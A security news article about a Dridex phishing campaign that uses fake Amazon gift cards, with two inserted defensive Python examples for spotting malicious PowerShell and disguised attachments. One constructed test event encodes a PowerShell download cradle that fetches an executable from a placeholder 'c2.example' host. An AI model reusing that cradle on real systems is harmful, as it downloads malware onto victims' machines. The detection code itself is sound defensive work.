

Amazon Gift Card Scam Delivers Dridex This Holiday Season

Dridex operators launch a social engineering scam that promises victims a $100 gift card but delivers a banking Trojan.

The operators behind Dridex have a nefarious trick up their sleeves this holiday season: A widespread phishing scam promises victims a $100 Amazon gift card but instead delivers the prolific banking Trojan to target machines.

This campaign first appeared around Halloween and picked up at the beginning of November, the Cybereason Nocturnus team reports. Most targets are in the United States and Western Europe, where Amazon is very popular and people may be more likely to fall for a scam like this – especially at a time when online shopping and gift-giving are more prevalent due to COVID-19.

Victims receive an email that claims to be delivering a gift from Amazon: "We are delighted to enclose a $100 Amazon gift card as our way of saying Thank You," a sample message says. The researchers found most emails pretend to come from Amazon, though exact wording may vary.

This email prompts its recipient to download a gift card, which leads to Dridex infection through one of three different methods. 

The first delivery vector is a malicious Word document with a variation of "gift card" in the file name. The file asks the victim to click "enable content," which runs its macros. This is a common technique in phishing attacks, because embedded macros are usually disabled by default.

If a user enables content, an obfuscated VBScript file is executed. The macro itself contains an obfuscated, base64-encoded PowerShell script that opens a pop-up with a fake error message. This tricks the user into thinking there was an error while the macro runs in the background. The PowerShell script connects to the command-and-control (C2) server and retrieves the Dridex payload.
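The chain just described (an Office application launching PowerShell with a base64 -EncodedCommand that reaches out for a payload) is what a defender would look for in process-creation telemetry. The following is an added Python example, not code from the article or from Cybereason; the events, the command line and the c2.example host are constructed for the demonstration.

```python
import base64
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match them all.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "net.webclient")

@dataclass
class Finding:
    parent: str      # the Office process that spawned PowerShell
    decoded: str     # command line as the analyst would read it
    downloads: bool  # does it look like a download cradle?

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE text) decoded, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse(events):
    """Flag PowerShell spawned by an Office app; decode and inspect its command line."""
    findings = []
    for parent, child, cmdline in events:
        if parent.lower() not in OFFICE_APPS or child.lower() != "powershell.exe":
            continue
        decoded = decode_encoded_command(cmdline) or cmdline
        low = decoded.lower()
        findings.append(Finding(parent, decoded, any(h in low for h in DOWNLOAD_HINTS)))
    return findings

def _encode_ps(script):
    # Builds the constructed sample exactly the way -EncodedCommand expects it.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample events: (parent image, child image, command line).
# c2.example is a placeholder host, not an indicator from the campaign.
SAMPLE_EVENTS = [
    ("explorer.exe", "WINWORD.EXE", "WINWORD.EXE Amazon_Gift_Card.doc"),
    ("WINWORD.EXE", "powershell.exe", "powershell.exe -nop -w hidden -enc " + _encode_ps(
        "(New-Object Net.WebClient).DownloadFile('http://c2.example/p.exe','C:\\Users\\Public\\p.exe')")),
    ("svchost.exe", "powershell.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\inventory.ps1"),
]
```

Only the event whose parent is an Office process is flagged; the administrative PowerShell run from svchost.exe is left alone, which is the signal-to-noise balance such a rule needs.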

The second delivery vector involves screensaver (SCR) files, which are also popular among attackers. They let criminals bypass email filters that rely solely on file extension, and bundle multiple components together, as SCR files are essentially self-executing archives.

"They can run and execute any type of code aside from the screensaver itself," explains Assaf Dahan, threat research lead at Cybereason. "So they have the potential of being malicious and they exploit this as well … to evade certain security products or email screening software."

In this campaign, the SCR files have convincing Amazon-themed icons and naming conventions, researchers point out in a writeup of their findings. One of the files contains a VBScript, an archive, a utility to extract it, and a batch file. 
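The screensaver vector described above works against filters that judge an attachment by its final extension alone. As an added example (not code from the article or from Cybereason), the following Python compares such an extension-only policy with one that also checks double extensions and the file's own header; the attachments are constructed, with a fake PE (MZ) header standing in for the real screensaver files.

```python
# Weak policy: only the obvious executable extensions are blocked, so a
# screensaver (.scr, still a Windows PE executable) slips through.
NAIVE_BLOCKLIST = {"exe", "com", "bat"}

# Stronger policy: every executable/script extension, double extensions,
# and the file's own header regardless of what the name claims.
EXECUTABLE_EXTENSIONS = {"exe", "com", "bat", "scr", "pif", "cpl"}
SCRIPT_EXTENSIONS = {"vbs", "vbe", "js", "jse", "wsf"}
PE_MAGIC = b"MZ"

def naive_filter_blocks(filename):
    """True if the extension-only filter would stop this attachment."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in NAIVE_BLOCKLIST

def content_aware_reasons(filename, data):
    """Return the list of reasons to quarantine; an empty list means allow."""
    reasons = []
    exts = filename.lower().split(".")[1:]
    if exts and exts[-1] in EXECUTABLE_EXTENSIONS:
        reasons.append(f"executable extension .{exts[-1]}")
    if exts and exts[-1] in SCRIPT_EXTENSIONS:
        reasons.append(f"script extension .{exts[-1]}")
    if len(exts) > 1:
        reasons.append("double extension ." + ".".join(exts))
    if data[:2] == PE_MAGIC:
        reasons.append("PE header (MZ) regardless of file name")
    return reasons

# Constructed sample attachments (name, first bytes); not files from the campaign.
FAKE_PE = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 8
SAMPLES = [
    ("Amazon_Gift_Card.scr", FAKE_PE),                 # SCR carrying a real PE header
    ("Amazon_Gift_Card.pdf.scr", FAKE_PE),             # double extension
    ("Amazon_Gift_Card.pdf", FAKE_PE),                 # PE renamed to look like a PDF
    ("receipt.pdf", b"%PDF-1.4\n%\xe2\xe3\xcf\xd3"),   # genuine-looking PDF
]

def compare(samples):
    """Map each name to (blocked by naive filter, reasons from content-aware filter)."""
    return {name: (naive_filter_blocks(name), content_aware_reasons(name, data))
            for name, data in samples}
```

The naive filter passes all three disguised executables; the content-aware one quarantines each of them and still lets the ordinary PDF through.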

The third delivery method is a straightforward VBScript file that is downloaded via a malicious link in the email body. It's about 2MB in size due to an archive bundled with it, researchers say.

Dridex's use of these techniques isn't unusual, Dahan says. The tactics themselves have proved effective for years, and a variety of infection methods increases the likelihood of successful attacks.

"It's mainly the idea of not putting all your eggs in one basket," he explains. "If one technique gets picked up by a certain security product or email filter, they'll still have other options, so it doesn't burn out their entire operation."

Some corporate devices, for example, have security policies that block macros from being enabled, which would disrupt the first attack method.

An Unwelcome Holiday Surprise
Dridex is a notorious banking Trojan that has been active in different variants since 2012, the Cybereason team reports. It is evasive malware that steals banking credentials and other sensitive data, with a resilient C2 infrastructure in which servers act as backups for one another.

Evil Corp, the attack group behind Dridex, makes a lot of money in attacks like these. While it's not directly stealing funds, it's obtaining access, credentials, and other valuable information it can sell on the Dark Web. Its scams cause great disruption for both people and businesses. 

"When you have fraud there's a lot of collateral damage," Dahan notes. "It costs not only the victims, who may lose money or may lose sensitive information, but there's also the cost to companies that need to reimburse their customers or invest time and money and effort in investigations and mitigations."

The threat to corporate machines is high, he points out. Once Dridex lands on a device, it could steal intellectual property, administrator credentials, and other data that could escalate the attack from a commodity malware incident to a full-fledged hacking operation.

When asked how employees can protect themselves from the threat, his first piece of advice is simple: "Just use common sense," he says. "There are no free gifts. If someone offers you a free gift, it's probably that they're up to no good." Recipients should simply ignore or delete the email.

Skeptical recipients should check the sender's email address; oftentimes in these attacks, the address will try to resemble the spoofed company's name but may contain typos or unnecessary characters. Look for grammatical errors or language that seems strange coming from Amazon or any major service provider, Dahan adds. If you do click a link and are prompted to enter credentials, close the page. The same advice applies to enabling macros.

"That's the last thing you should do," Dahan warns. "You should not enable that content because by enabling the content you will allow malicious code to run on your machine." 

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ...
